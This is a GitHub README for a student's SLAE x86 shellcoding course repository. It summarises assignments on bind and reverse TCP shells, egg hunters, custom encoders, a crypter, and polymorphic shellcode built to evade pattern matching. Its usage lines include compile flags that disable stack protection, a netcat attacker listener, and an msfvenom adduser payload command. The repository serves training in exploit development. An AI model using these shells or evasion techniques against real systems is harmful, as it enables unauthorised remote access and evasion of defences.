Skip to content
/ SLAEx86 Public

SLAE x86 Assembly Language and Shellcoding on Linux

9 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

dibsy/SLAEx86

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

76 Commits
additional_assignments
additional_assignments
 
 
assignment1
assignment1
 
 
assignment2
assignment2
 
 
assignment3
assignment3
 
 
assignment4
assignment4
 
 
assignment5
assignment5
 
 
assignment6
assignment6
 
 
assignment7
assignment7
 
 
scripts
scripts
 
 
README.md
README.md
 
 
SHELLCODING32.png
SHELLCODING32.png
 
 

Repository files navigation

SLAEx86

x86 Assembly Language and Shellcoding on Linux

SLAEx86 : Student ID: PA-1191

Assignment 1

Create a Shell Bind TCP Shellcode

  • Binds to a port
  • Execs shell on incoming connection
  • Port number should be easily configurable
Implemeted the TCP Bind Shell shellcode 
Usage : 

=> gcc shellcode_with_configurable_port.c -zexecstack -fno-stack-protector -o bind_shell
=> ./bind_shell <PORT_TO_BIND>

Victim Machine => ./bind_shell 9999 

Attacker Machine => nc 127.0.0.1 9999

Blog : https://oxhat.blogspot.com/2018/04/coding-custom-tcp-bind-shell-shellcode.html

Assignment 2

Create a Shell Reverse Tcp Shellcode

  • Reverse connect to configured IP and Port
  • Execs shell on incoming connection
  • IP and Port should be easily configurable
Implemeted the TCP Reverse Shell shellcode 
Usage : 

=> gcc shellcode_with_configurable_port.c -zexecstack -fno-stack-protector -o reverse_shell
=> ./reverse_shell <ATTACKER_IP TO CONNECT> <ATTACKER_PORT_TO_CONNECT>

Attacker Machine => nc -nlvp 8888

Victim Machine => ./reverse_shell 127.0.0.1 8888  

Blog : https://oxhat.blogspot.com/2018/04/coding-custom-tcp-reverse-shell.html

Assignment 3

Study about Egg Hunter Shellcode

  • Create a working demo of the Egg Hunter
  • Should be configurable for different payload
Usage: 

Open the  egghunter_c_wrapper.c and put the any shellcode in the shellcode array location
=> gcc egghunter_c_wrapper.c -o egghunter_c_wrapper.o -zexecstack -fno-stack-protector
=> ./egghunter_c_wrapper.o

Blog : https://oxhat.blogspot.com/2019/04/egg-hunter-shellcode.html
       https://oxhat.blogspot.com/2018/04/why-do-we-need-egg-hunters.html

Assignment 4

Create a custom encoding scheme like "Insertion Encoder" we showed you

  • Poc using execve-stack as the shellcode to encode your schema and execute
Implemented a custom encoder where each shellcode value is xored and duplicated to generate the final shellcode
Implemented a custom decoder to decode the encoded shellcode

Usage:
generating encoded shellcode 

Put the shellcode inside the custom_insertion_encoder.py
=> python custom_insertion_encoder.py

decoding and executing
copy and put the encoded shellcode inside the nasm file
=> nasm custom_insertion_decoder.nasm -felf32 -o custom_insertion_decoder.o
=> ld custom_insertion_decoder.o -o custom_insertion_decoder
=> ./custom_insertion_decoder

Blog : https://oxhat.blogspot.com/2019/04/coding-custom-insertion-encoder-and.html

Assignment 5

Take up at least 3 shellcode sample created using Msfpayload for linux/x86

  • Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode
  • Present your analysis
As msfpayload is outdate, all the payloads are created using msfvenom

1. Analysis of linux/x86/adduser shellcode

2. Analysis of linux/x86/chmod shellcode

3. Analysis of linux/x86/exec shellcode

Usage:

Shellcode Generation:
=> msfvenom --platform linux --arch x86 --payload linux/x86/adduser USER=slae PASS=slaeslae -i0 -f hex

Shellcode Analysis
=> echo -ne "Some shellcode \xaa\xbb" | ndisasm -u -
=> echo -ne "Some shellcode \xaa\xbb" | /opt/libemu/bin/sctest -vvv -Ss 10000 -G image.dot
=> dot image.dot -Tpng -o image.png

Blog : https://oxhat.blogspot.com/2019/04/analyzing-shellcode.html

Assignment 6

Take upto 3 shellcode from shell-storm and create a polymorphic versions of them to beat patten matching

  • The polymorphic versions cannot be larger 150% of the existing shellcode
  • Bonus point for making it shorter in length than original
1. Implemented 2 polmorphic versions of exit() shellcode 

2. Implmented polymorphic version of cat /etc/password shellcode

3. Implemented a polymorphic and obfuscated version of commandline netcat 

Blog : https://oxhat.blogspot.com/2019/04/polymorphic-shellcodes.html

Assignment 7

Create a custom crypter like the one shown in "crypters" video.

  • Free to use any existing encryption schema.
  • Can use any programming language.
1. Implemented a crypter with encrytion based on one time pad.

Usage:

put the shellcode and passcode in genkey.py
=> python genkey.py
Copy the key
copy the encrypted shellcode in the shellcode array in assignment7.c
=> gcc assignment7.c -o crypter -zexecstack -fno-stack-protector
=> ./crypter <KEY>

Blog : https://oxhat.blogspot.com/2019/04/coding-custom-crypter.html

Additional Assignments

1. Implemented a shellcode for chdir()

Scripts

1. Implmented a bash automation script to generate shellcode from binary
usage: 

=>dump.sh binary
There is also an extended version of this inside the same directory.
Sometimes the script does not dump all the shellcode properly so the extended version is used.

2. Implemented an automation script to generate a C code with an embedded shellcode inside it.
usage :

=>python shellcode_template.py filename.c "\x41\x41\x41x\41"

About

SLAE x86 Assembly Language and Shellcoding on Linux

Topics

slae slae32 slae32-assignments slae-x86

Resources

Readme
Activity

Stars

9 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages